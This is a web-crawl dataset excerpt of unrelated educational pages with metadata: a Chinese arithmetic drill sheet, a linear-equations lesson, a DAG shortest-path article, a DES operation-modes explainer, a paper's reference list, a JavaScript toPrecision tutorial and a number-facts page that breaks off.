[ "# 小学一年级下册数学12套口算题\n\n 29-11= 16- 4= 89-24= 29- 8= 98-77= 52-50= 24-13= 10+20= 14+25= 31-11= 17- 7= 19-12= 98-80= 25-4= 99-23= 24-13= 15+14= 90-10= 20+8= 25+33= 18+11= 28+2= 29+1= 25+25= 26-10= 12+5= 28+11= 25+12= 23-3= 12+10= 16+13= 24+4= 19+11= 17-12= 18-8= 19-6= 29+10= 72-10= 20+30= 99-98= 12+17= 60-40= 17-17= 90-40= 16+54= 20-10= 70-50= 50-30= 60+30= 12+33= 28+6= 16+44= 20+44= 50-50= 19-18= 18-15= 88+12= 66-16= 90-30= 65-25= 50-20= 87-7= 80+9= 18-13= 13+17= 15+53= 16+13= 14+22= 89-80= 14+26= 56-40= 66-20= 99-33= 66-46= 19+60= 17-(  )=0 17-14= 15-3= 80+4= 26-16= 19-(  )=13 27-14= 18+(  )=20 14+(  )=27 67-12= 16-(  )=12 65-33= 65+25= 24+24= 8+(  )=16 10+(  )=50 65+(  )=70 (  )-20=50 40+(  )=60 20+(  )=30 87-33= 16-6= 80-(  )=0 75-25= 30+30=\n\n 69+ 3= 47- 6= 59+10= 28+ 9= 73+ 6= 4 +50= 22- 9= 15+ 8= 8 +12= 9 + 6= 18- 9= 72- 2= 49+ 7= 27+14= 59- 6= 82- 1= 25- 5= 64+ 5= 89- 4= 19- 6= 55+25= 69+13= 48+13= 87-12= 21- 5= 9 +43= 12+10= 80-20= 67-15= 35-16= 29-13= 66-15= 12- 7= 10+19= 16-11= 90+10= 29-13= 85-16= 44-13= 22-11= 34+16= 88-18= 60-12= 51-12= 97-17= 17+16= 26+ 3= 67- 7= 98-18= 29-19= 100-4= 99+ 1= 29-13= 39+ 2= 30+12= 83-11= 50+50= 29-10= 68+ 5= 30+70= 87-10= 77-15= 99-66= 33+11= 16+ 3= 83-19= 26+38= 70+20= 56+16= 60-20= 22+40= 34+12= 13- 8= 23- 4= 82- 6= 82-15= 100-(  )=80 23-(  )=18 44+(  )=60 70-(  )=20 23+16= 55+33= 34+12= 47-30= 21+47= 26+(  )=66 86+9= 66+5= 24+9= 9 +54= 60-16= 16+(  )=56 41-(  )=30 86-12= 73-44= 66+12= 74-15= 69-13= 69+(  )=80 44-15=", null, "" ]
[ null, "http://www.51zjedu.com/images/download.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.59521735,"math_prob":1.0000097,"size":1839,"snap":"2021-31-2021-39","text_gpt3_token_len":1079,"char_repetition_ratio":0.25395095,"word_repetition_ratio":0.0,"special_character_ratio":0.94072866,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.00001,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-03T18:14:29Z\",\"WARC-Record-ID\":\"<urn:uuid:313dca02-98f2-4b91-958a-a1910d0a4eb7>\",\"Content-Length\":\"170487\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:edcded18-d4db-4d25-bc8d-cbcdb26b47e8>\",\"WARC-Concurrent-To\":\"<urn:uuid:197970cd-3da7-4fa8-9834-df7b84a7b481>\",\"WARC-IP-Address\":\"114.215.199.96\",\"WARC-Target-URI\":\"http://www.51zjedu.com/yinianji/rjbsxx/27865.html\",\"WARC-Payload-Digest\":\"sha1:AVIOCVTQH37BAHARFNCU5PI5VZOTY2SN\",\"WARC-Block-Digest\":\"sha1:ZOAMKRRXMPBIF5X334QCNSKSWGY6DGF5\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154466.61_warc_CC-MAIN-20210803155731-20210803185731-00015.warc.gz\"}"}
https://slideplayer.com/slide/6204500/
[ "", null, "# 1.3 Linear Equations in Two Variables Objectives: Write a linear equation in two variables given sufficient information. Write an equation for a line.\n\n## Presentation on theme: \"1.3 Linear Equations in Two Variables Objectives: Write a linear equation in two variables given sufficient information. Write an equation for a line.\"— Presentation transcript:\n\n1.3 Linear Equations in Two Variables Objectives: Write a linear equation in two variables given sufficient information. Write an equation for a line that is parallel or perpendicular to a given line. Standard: 2.8.11.A Analyze a given set of data for the existence of a pattern and represent the pattern algebraically and graphically.\n\nI. Point-Slope Form If a line has a slope of m and contains the point (x 1, y 1 ), then the point-slope form of its equation is y – y 1 = m(x – x 1 ). Ex 1. Write an equation in point-slope form for the line that has a slope of ½ and contains the point (-8, 3). Then write the equation in slope-intercept form.\n\nI. Point-Slope Form Ex 2. Write an equation in point-slope form for the line that has a slope of 5 and passes through the point (-1, -3). Then write the equation in slope- intercept form.\n\nII. Writing an equation in slope-intercept form for a line containing two given points. Find the slope. Substitute “m” & one of the two points you were given into y = mx + b to find “b.” Write the equation in y = mx + b form with the values for “m” and the “b” that you calculated.\n\nII. Write an equation in slope-intercept form for the line containing the two given points. Ex 1. (4, -3) and (2,1)\n\nII. Write an equation in slope-intercept form for the line containing the two given points. Ex 2. (1, -3) and (3, -5)\n\nIII. Parallel and Perpendicular Lines Parallel Lines – If two lines have the same slope, they are parallel. If two lines are parallel, they have the same slope. All vertical lines have an undefined slope and are parallel to one another. All horizontal lines have a slope of 0 and are parallel to one another. y = 2x + 5 and y = 2x – 1 Perpendicular Lines – If a nonvertical line is perpendicular to another line, the slopes of the lines are opposite sign and reciprocal of one another. All vertical lines are perpendicular to all horizontal lines. All horizontal lines are perpendicular to all vertical lines. y = 2x + 2 & y = -1/2x + 4\n\nIII. Parallel and Perpendicular Lines (-2, 5), y = -2x + 4 Parallel Perpendicular\n\nIII. Parallel and Perpendicular Lines (8, 5), y = -x + 2 Parallel Perpendicular\n\nIII.Parallel and Perpendicular Lines 1.(5, -3), y = 4x + 22. (-2, 3), y = -3x+2 3. (4, -3), 3x + 4y = 84. (-6, 2), y = -2/3 x - 3 For each of the following: 5.(1, -4), y = 3x – 26. (0, -5), y = x – 5 7. (3, -1), 12x + 4y = 88. (-2, 4), x – 6y = 15 Find a line that goes through the given point and is parallel to the given line. Find a line that goes through the given point and is perpendicular to the given line.\n\nWriting Activities: Parallel and Perpendicular Lines 1. Describe the relationship between the equations of 2 parallel lines. Include an example. 2. Describe the relationship between the equations of 2 perpendicular lines. Include an example.\n\n3. Explain how to write an equation for the line that contains the point (2, -3) and is parallel to the graph of x – 2y = 2. 4. Explain how to write an equation for the line that contains the point (2, -3) and is perpendicular to the graph of x – 2y = 2.\n\nHomework Integrated Algebra II- Section 1.3 Level A even #’s Honors Algebra II- Section 1.3 Level B\n\nDownload ppt \"1.3 Linear Equations in Two Variables Objectives: Write a linear equation in two variables given sufficient information. Write an equation for a line.\"\n\nSimilar presentations" ]
[ null, "https://slideplayer.com/static/blue_design/img/slide-loader4.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87089324,"math_prob":0.999121,"size":3380,"snap":"2023-40-2023-50","text_gpt3_token_len":947,"char_repetition_ratio":0.17624408,"word_repetition_ratio":0.19129083,"special_character_ratio":0.29822487,"punctuation_ratio":0.1401099,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999157,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-30T03:59:20Z\",\"WARC-Record-ID\":\"<urn:uuid:5903c715-793d-4bc9-8532-7165fed946aa>\",\"Content-Length\":\"157616\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0ba68fab-c6ee-4c24-b1b3-b014e1dc066c>\",\"WARC-Concurrent-To\":\"<urn:uuid:cbb697f5-1a95-4006-a344-4e48642c11d3>\",\"WARC-IP-Address\":\"138.201.54.25\",\"WARC-Target-URI\":\"https://slideplayer.com/slide/6204500/\",\"WARC-Payload-Digest\":\"sha1:XHNX5XE6AWMJ7S7GUSYZJFBHAPLNFWAE\",\"WARC-Block-Digest\":\"sha1:TJNZW7RSPPR47YQNE5YTGNZ44RFFGJ5C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100164.87_warc_CC-MAIN-20231130031610-20231130061610-00882.warc.gz\"}"}
https://dzone.com/articles/algorithm-week-shorted-path
[ "{{announcement.body}}\n{{announcement.title}}\n\n# Algorithm of the Week: Shortest Path in a Directed Acyclic Graph\n\nDZone 's Guide to\n\n# Algorithm of the Week: Shortest Path in a Directed Acyclic Graph\n\n· Database Zone ·\nFree Resource\n\nComment (0)\n\nSave\n{{ articles.views | formatCount}} Views\n\n## Introduction\n\nWe saw how to find the shortest path in a graph with positive edges using the Dijkstra’s algorithm. We also know how to find the shortest paths from a given source node to all other nodes even when there are negative edges using the Bellman-Ford algorithm. Now we’ll see that there’s a faster algorithm running in linear time that can find the shortest paths from a given source node to all other reachable vertices in a directed acyclic graph, also known as a DAG.\n\nBecause the DAG is acyclic we don’t have to worry about negative cycles. As we already know it’s pointless to speak about shortest path in the presence of negative cycles because we can “loop” over these cycles and practically our path will become shorter and shorter.", null, "The presence of a negative cycles make our attempt to find the shortest path pointless!\n\nThus we have two problems to overcome with Dijkstra and the Bellman-Ford algorithms. First of all we needed only positive weights and on the second place we didn’t want cycles. Well, we can handle both cases in this algorithm.\n\n## Overview\n\nThe first thing we know about DAGs is that they can easily be topologically sorted. Topological sort can be used in many practical cases, but perhaps the mostly used one is when trying to schedule dependent tasks.\n\nAfter a topological sort we end with a list of vertices of the DAG and we’re sure that if there’s an edge (u, v), u will precede v in the topologically sorted list.", null, "If there’s an edge (u,v) then u must precede v. This results in the more general case from the image. There’s no edge between B and D, but B precedes D!\n\nThis information is precious and the only thing we need to do is to pass through this sorted list and to calculate distances for a shortest paths just like the algorithm of Dijkstra.\n\nOK, so let’s summarize this algorithm:\n- First we must topologically sort the DAG;\n- As a second step we set the distance to the source to 0 and infinity to all other vertices;\n- Then for each vertex from the list we pass through all its neighbors and we check for shortest path;\n\nIt’s pretty much like the Dijkstra’s algorithm with the main difference that we used a priority queue then, while this time we use the list from the topological sort.\n\n## Code\n\nThis time the code is actually a pseudocode. Although all the examples so far was in PHP, perhaps pseudocode is easier to understand and doesn’t bind you in a specific language implementation. Also if you don’t feel comfortable with the given programming language it can be more difficult for you to understand the code than by reading pseudocode.\n\n```1. Topologically sort G into L;\n2. Set the distance to the source to 0;\n3. Set the distances to all other vertices to infinity;\n4. For each vertex u in L\n5. - Walk through all neighbors v of u;\n6. - If dist(v) > dist(u) + w(u, v)\n7. - Set dist(v) <- dist(u) + w(u, v);\n```\n\n## Application\n\nIt’s clear why and where we must use this algorithm. The only problem is that we must be sure that the graph doesn’t have cycles. However if we’re aware of how the graph is created we may have some additional information if there are cycles or not – then this linear time algorithm can be very applicable.\n\nTopics:\n\nComment (0)\n\nSave\n{{ articles.views | formatCount}} Views\n\nPublished at DZone with permission of Stoimen Popov , DZone MVB. See the original article here.\n\nOpinions expressed by DZone contributors are their own." ]
[ null, "http://www.stoimen.com/blog/wp-content/uploads/2012/10/1.-Negative-Cycles.png", null, "http://www.stoimen.com/blog/wp-content/uploads/2012/10/3.-Topological-Sort-part-2.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90253973,"math_prob":0.8871313,"size":3404,"snap":"2020-34-2020-40","text_gpt3_token_len":747,"char_repetition_ratio":0.11147059,"word_repetition_ratio":0.06,"special_character_ratio":0.21592245,"punctuation_ratio":0.087537095,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96539515,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-07T04:15:16Z\",\"WARC-Record-ID\":\"<urn:uuid:ac66ed86-042d-4075-837d-e1ae9da09d6c>\",\"Content-Length\":\"182346\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c7b5a214-7211-46fb-b674-50dcd2abd0e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:06240a23-63cc-42ac-9c0f-332463af595d>\",\"WARC-IP-Address\":\"3.217.61.161\",\"WARC-Target-URI\":\"https://dzone.com/articles/algorithm-week-shorted-path\",\"WARC-Payload-Digest\":\"sha1:2RFK6HNEGZ4BD736VGTSUVUJZOIXMRDY\",\"WARC-Block-Digest\":\"sha1:DZIRXD7E6L5SRENPIXUDCHD3IZ7ESZWU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439737152.0_warc_CC-MAIN-20200807025719-20200807055719-00044.warc.gz\"}"}
http://www.physicsebookcollection.com/2015/09/elementary-mechanics-and-thermodynamics.html
[ "## Thursday, September 24, 2015\n\n### Elementary Mechanics and Thermodynamics by Prof. John W. Norbury", null, "Elementary Mechanics and Thermodynamics Textbook is an ideal book for a typical semester which is 15 weeks long, giving 30 weeks at best for a year long course. At the fastest possible rate, we can \"cover\" only one chapter per week. For a year long course that is 30 chapters at best. Thus ten chapters of the typical book are left out! 1500 pages divided by 30 weeks is about 50 pages per week. The typical text is quite densed mathematics and physics and it's simply impossible for a student to read all of this in the detail required. Also with 100 problems per chapter, it's not possible for a student to do 100 problems each week. Thus it is impossible for a student to fully read and do all the problems in the standard introductory books. Thus these books are not useful to students or instructors teaching the typical course!" ]
[ null, "http://ultraimg.com/images/D6kpR.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9357445,"math_prob":0.61621165,"size":861,"snap":"2020-45-2020-50","text_gpt3_token_len":186,"char_repetition_ratio":0.126021,"word_repetition_ratio":0.013157895,"special_character_ratio":0.22299652,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9521401,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-26T01:07:49Z\",\"WARC-Record-ID\":\"<urn:uuid:5164ac13-bff8-4eca-a20f-7d50da75179a>\",\"Content-Length\":\"88553\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d4b9f490-aa47-49dd-8126-1a32a0f06f46>\",\"WARC-Concurrent-To\":\"<urn:uuid:da34ac81-3839-4b9a-b932-cb37cc9bfefb>\",\"WARC-IP-Address\":\"172.217.7.243\",\"WARC-Target-URI\":\"http://www.physicsebookcollection.com/2015/09/elementary-mechanics-and-thermodynamics.html\",\"WARC-Payload-Digest\":\"sha1:B64YNI3OSDCY2SES2KAFRDNIHI7O5GCV\",\"WARC-Block-Digest\":\"sha1:HBPV2IUJSLV74N4QI275JN4QVBFR2MUL\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107890108.60_warc_CC-MAIN-20201026002022-20201026032022-00421.warc.gz\"}"}
http://herongyang.com/Cryptography/DES-Mode-Encryption-Operation-Mode-Introduction.html
[ "DES Encryption Operation Mode Introduction\n\nThis section describes what are DES encryption operation modes and notations used to describe how each operation mode works.\n\nDES encryption algorithm defines how a single 64-bit plaintext block can be encrypted. It does not define how a real plaintext message with an arbitrary number of bytes should be padded and arranged into 64-bit input blocks for the encryption process. It does not define how one input block should be coupled with other blocks from the same original plaintext message to improve the encryption strength.\n\n(FIPS) Federal Information Processing Standards Publication 81 published in 1980 provided the following block encryption operation modes to address how blocks of the same plaintext message should be coupled:\n\n• ECB - Electronic Code Book operation mode.\n• CBC - Cipher Block Chaining operation mode.\n• CFB - Cipher Feedback operation mode\n• OFB - Output Feedback operation mode\n\nSee http://www.itl.nist.gov/fipspubs/fip81.htm for details.\n\nIn order to describe these operation modes, we need to define the following notations:\n\nP = P, P, P, ..., P[i], ... - Representing the original plaintext message, P, being arranged into multiple 64-bit plaintext blocks. P[i] represents plaintext block number i.\n\nEk(P[i]) - Representing the DES encryption algorithm applied on a single 64-bit plaintext block, P[i], with a predefined key, k.\n\nC = C, C, C, ..., C[i], ... - Representing the final ciphertext message, C, being regrouped from multiple 64-bit ciphertext blocks. C[i] represents ciphertext block number i.\n\nIV - Called \"Initial Vector\", representing a predefined 64-bit initial value.\n\nWith these notations, we are ready to describe different operation modes that can be applied the DES encryption algorithm.\n\nTable of Contents" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74000585,"math_prob":0.8072995,"size":3149,"snap":"2019-13-2019-22","text_gpt3_token_len":674,"char_repetition_ratio":0.14594595,"word_repetition_ratio":0.01330377,"special_character_ratio":0.20482694,"punctuation_ratio":0.11588785,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97020715,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-22T21:59:57Z\",\"WARC-Record-ID\":\"<urn:uuid:a7930bed-a660-45ce-8d68-00e316d6ed45>\",\"Content-Length\":\"14690\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ed40be5b-31c4-481d-a525-4e1e72ff7d01>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb3f0114-d4c8-4119-9f82-3aac81fb6ed5>\",\"WARC-IP-Address\":\"74.208.236.35\",\"WARC-Target-URI\":\"http://herongyang.com/Cryptography/DES-Mode-Encryption-Operation-Mode-Introduction.html\",\"WARC-Payload-Digest\":\"sha1:PGJSGUVC75WNNQXJ2CLLIZ7KGIHOZ6PF\",\"WARC-Block-Digest\":\"sha1:P2WZGO2FYHGGHP4NNDKM2LBD5ARMC65Y\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232256958.53_warc_CC-MAIN-20190522203319-20190522225319-00210.warc.gz\"}"}
https://link.springer.com/article/10.1007%2Fs00034-016-0356-x
[ "Circuits, Systems, and Signal Processing\n\n, Volume 36, Issue 3, pp 1322–1339\n\nNonparametric Variable Step-Size LMAT Algorithm\n\nShort Paper\n\nAbstract\n\nThis paper proposes a nonparametric variable step-size least mean absolute third (NVSLMAT) algorithm to improve the capability of the adaptive filtering algorithm against the impulsive noise and other types of noise. The step-size of the NVSLMAT is obtained using the instantaneous value of a current error estimate and a posterior error estimate. This approach is different from the traditional method of nonparametric variance estimate. In the NVSLMAT algorithm, fewer parameters need to be set, thereby reducing the complexity considerably. Additionally, the mean of the additive noise does not necessarily equal zero in the proposed algorithm. In addition, the mean convergence and steady-state mean-square deviation of the NVSLMAT algorithm are derived and the computational complexity of NVSLMAT is analyzed theoretically. Furthermore, the experimental results in system identification applications presented illustrate the principle and efficiency of the NVSLMAT algorithm.\n\nKeywords\n\nLMAT Variable step-size Impulsive noise Nonparametric Most of the noise densities System identification\n\nReferences\n\n1. 1.\nW.P. Ang, B. Farhang-Boroujeny, A new class of gradient adaptive step-size LMS algorithms. IEEE Trans. Signal Process. 49(4), 805–810 (2001)\n2. 2.\nJ. Benesty, H. Rey, L. Rey, Vega, S. Tressens, A nonparametric VSS NLMS algorithm. IEEE Signal Process. Lett. 13(10), 581–584 (2006)\n3. 3.\nD. Bismor, LMS algorithm step-size adjustment for fast convergence. Arch. Acoust. 37(1), 31–40 (2012)\n4. 4.\nS.H. Cho, S.D. Kim, H.P. Moom, J.Y. NA, The least mean absolute third (LMAT) adaptive algorithm: mean and mean-squared convergence properties. In Proceedings of Sixth Western Pacific Reg. Acoust. Conf., Hong Kong, 22(10), 2303–2309 (1997)Google Scholar\n5. 5.\nP.S.R. Diniz, Adaptive Filtering, vol. Fourth (Springer, Boston, 2013)\n6. 6.\nE. Eweda, Dependence of the stability of the least mean fourth algorithm on target weights nonstationarity. IEEE Trans. Signal Process. 62(7), 1634–1643 (2014)\n7. 7.\nE. Eweda, N. Bershad, Stochastic analysis of a stable normalized least mean fourth algorithm for adaptive noise canceling with a white gaussian reference. IEEE Trans. Signal Process. 60(12), 6235–6244 (2012)\n8. 8.\nX.Z. FU, Z. Liu, C.X. LI, Anti-interference performance improvement for sigmoid function variable step-size LMS adaptive algorithm. J. Beijing Univ. Posts Telecommun. 34(6), 112–120 (2011)Google Scholar\n9. 9.\nK. Hirano, Rayleigh Distribution (Wiley, London, 2014)\n10. 10.\nS.D. Kim, S.S. Kim, S.H. Cho, Least mean absolute third (LMAT) adaptive algorithm: part II. Perform. Eval. Algorithm 22(10), 2310–2316 (1997)Google Scholar\n11. 11.\nR.H. Kwong, E.W. Johnston, A variable step-size LMS algorithm. IEEE Trans. Signal Process. 40(7), 1633–1642 (1992)\n12. 12.\nY.H. Lee, D.M. Jin, D.K. Sang, S.H. Cho, Performance of least mean absolute third (LMAT) adaptive algorithm in various noise environments. Electron. Lett. 34(3), 241–243 (1998)\n13. 13.\nJ.C. Liu, X. Yu, H.R. Li, A nonparametric variable step-size NLMS algorithm for transversal filters. Appl. Math. Comput. 217(17), 7365–7371 (2011)\n14. 14.\nK. Mayyas, A variable step-size selective partial update LMS algorithm. Digit. Signal Process. 23, 75–85 (2013)\n15. 15.\nA.H. Sayed, Adaptive Filters (Wiley, Hoboken, 2008)\n16. 16.\nH.C. Shin, A.H. Sayed, W.J. Song, Variable step-size NLMS and affine projection algorithms. IEEE Signal Process. Lett. 11(2), 132–135 (2004)\n17. 17.\nM.R. Spiegel, Mathematical Handbook of Formulas and Tables (McGraw-Hill, New York, 2012)Google Scholar\n18. 18.\nP. Wang, P.Y. Kam, An automatic step-size adjustment algorithm for LMS adaptive filters and an application to channel estimation. Phys. Commun. 5, 280–286 (2012)\n19. 19.\nH.X. Wen, X.H. Lai, L. Chen, Z. Cai, Nonparametric VSS-APA based on precise background noise power estimate. J. Cent. South Univ. 22, 251–260 (2015)\n20. 20.\nJ.W. Yoo, J.W. Shin, P.G. Park, An improved NLMS algorithm in sparse systems against noisy input signals. IEEE Trans. Circuits Syst. II Expr. Br. 62(3), 271–275 (2015)\n21. 21.\nX. Yu, J.C. Liu, H.R. Li, An adaptive inertia weight particle swarm optimization algorithm for IIR digital filter. In Proceedings of the 2009 International Conference on Artificial Intelligence and Computational Intelligence (AICI2009), pp. 114–118 (2009)Google Scholar\n22. 22.\nA. Zerguine, Convergence and steady-state analysis of the normalized least mean fourth algorithm. Digit. Signal Process. 17(1), 17–31 (2007)\n23. 23.\nH. Zhao, Y. Yu, S. Gao, Z. He, A new normalized LMAT algorithm and its performance analysis. Signal Process. 105(12), 399–409 (2014)", null, "" ]
[ null, "https://link.springer.com/track/controlled/article/denied/10.1007/s00034-016-0356-x", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6688067,"math_prob":0.8738269,"size":5315,"snap":"2019-43-2019-47","text_gpt3_token_len":1438,"char_repetition_ratio":0.1711542,"word_repetition_ratio":0.0098730605,"special_character_ratio":0.27883348,"punctuation_ratio":0.2513661,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95575076,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-21T15:47:13Z\",\"WARC-Record-ID\":\"<urn:uuid:ce55f61f-ba5f-4587-a22f-ee5767c56cf6>\",\"Content-Length\":\"87412\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d80497d3-1f61-4687-b97f-1e57be49f785>\",\"WARC-Concurrent-To\":\"<urn:uuid:cf217a7c-a41f-44ea-82bb-8830a5e1dc5b>\",\"WARC-IP-Address\":\"151.101.248.95\",\"WARC-Target-URI\":\"https://link.springer.com/article/10.1007%2Fs00034-016-0356-x\",\"WARC-Payload-Digest\":\"sha1:Z4HN6LQPFB5T3DNZRIFIKTRTGAA6URHP\",\"WARC-Block-Digest\":\"sha1:NINWIFKT2ZVMRGJ7344UVYWCUCSP5NP4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987779528.82_warc_CC-MAIN-20191021143945-20191021171445-00459.warc.gz\"}"}
https://tutorialspoint.dev/language/javascript/javascript-toprecision-function
[ "# JavaScript | toPrecision( ) Function\n\nThe toPrecision() method in Javascript is used to format a number to a specific precision or length. If the formatted number requires more number of digits than original number then decimals and nulls are also added to create the specified length.\n\nSyntax:\n\n`number.toPrecision(value)`\n\nThe toPrecision() function is used with a number as shown in above syntax using the ‘.’ operator. This function will format a number to a specified length.\n\nParameters: This function accepts a single parameter value. This parameter is also optional and it represents the value of the number of significant digits the user wants in the formatted number.\n\nReturn Value: The toPrecision() method in JavaScript returns a string in which the number is formatted to the specified precision.\n\nBelow are some examples to illustrates toPrecision() function:\n\n1. Passing no arguments in the toPrecision() method: If no arguments is passed to the toPrecision() function then the formatted number will be exactly the same as input number. Though, it will be represented as a string rather than a number.\n `       `  `<``script` `type``=``\"text/javascript\"``> ` `    ``var num=213.45689; ` `    ``document.write(num.toPrecision());           ` ` `\n\n/div>\n\nOutput:\n\n`213.45689`\n2. Passing an argument in the toPrecision() method: If the length of precision passed to the toPrecision() function is smalller than the original number then the number is rounded off to that precision.\n `<``script` `type``=``\"text/javascript\"``> ` `    ``var num=213.45689; ` `    ``document.write(num.toPrecision(4));           ` ` `\n\nOutput:\n\n`213.5`\n3. Passing an argument which results in addition of null in the output: If the length of precision passed to the toPrecision() function is greater than the original number then zero’s are appended to the input number to meet the specified precision.\n `<``script` `type``=``\"text/javascript\"``> ` `    ``var num=213.45689; ` `    ``document.write(num.toPrecision(12));   ` ` `  `    ``var num2 = 123; ` `    ``document.write(num2.toPrecision(5));         ` ` `\n\nOutput:\n\n```213.456890000\n123.00\n```\n\nNote: If the precision specified is not in between 1 and 100 (inclusive), it results in a RangeError.\n\n## tags:\n\nJavaScript JavaScript-Misc JavaScript-Numbers" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5661592,"math_prob":0.92196953,"size":2372,"snap":"2022-40-2023-06","text_gpt3_token_len":518,"char_repetition_ratio":0.19130068,"word_repetition_ratio":0.23333333,"special_character_ratio":0.23819561,"punctuation_ratio":0.12383178,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99257505,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-07T05:21:24Z\",\"WARC-Record-ID\":\"<urn:uuid:412237b1-1437-4e8e-82f7-16057b488edd>\",\"Content-Length\":\"23669\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c760af4a-89bc-4f26-85f0-740b424c5bf6>\",\"WARC-Concurrent-To\":\"<urn:uuid:b6ff80f3-3a0e-4c9e-a0dd-912f658f35bf>\",\"WARC-IP-Address\":\"104.21.79.77\",\"WARC-Target-URI\":\"https://tutorialspoint.dev/language/javascript/javascript-toprecision-function\",\"WARC-Payload-Digest\":\"sha1:H73FAMI3BSA77VAUAQA2NKOEIVPX2BZ3\",\"WARC-Block-Digest\":\"sha1:LFMRLFLXXBRLF7KZVXQMS7QKYRM4OYOY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337971.74_warc_CC-MAIN-20221007045521-20221007075521-00794.warc.gz\"}"}
https://metanumbers.com/1852519000000
[ "1852519000000 (number)\n\n1,852,519,000,000 (one trillion eight hundred fifty-two billion five hundred nineteen million) is an even thirteen-digits composite number following 1852518999999 and preceding 1852519000001. In scientific notation, it is written as 1.852519 × 1012. The sum of its digits is 31. It has a total of 14 prime factors and 196 positive divisors. There are 702,000,000,000 positive integers (up to 1852519000000) that are relatively prime to 1852519000000.\n\nBasic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 13\n• Sum of Digits 31\n• Digital Root 4\n\nName\n\nShort name 1 trillion 852 billion 519 million one trillion eight hundred fifty-two billion five hundred nineteen million\n\nNotation\n\nScientific notation 1.852519 × 1012 1.852519 × 1012\n\nPrime Factorization of 1852519000000\n\nPrime Factorization 26 × 56 × 19 × 97501\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 14 Total number of prime factors rad(n) 18525190 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,852,519,000,000 is 26 × 56 × 19 × 97501. Since it has a total of 14 prime factors, 1,852,519,000,000 is a composite number.\n\nDivisors of 1852519000000\n\n196 divisors\n\n Even divisors 168 28 14 14\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 196 Total number of the positive divisors of n σ(n) 4.83695e+12 Sum of all the positive divisors of n s(n) 2.98443e+12 Sum of the proper positive divisors of n A(n) 2.46783e+10 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 1.36107e+06 Returns the nth root of the product of n divisors H(n) 75.0666 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,852,519,000,000 can be divided by 196 positive divisors (out of which 168 are even, and 28 are odd). The sum of these divisors (counting 1,852,519,000,000) is 4,836,951,367,480, the average is 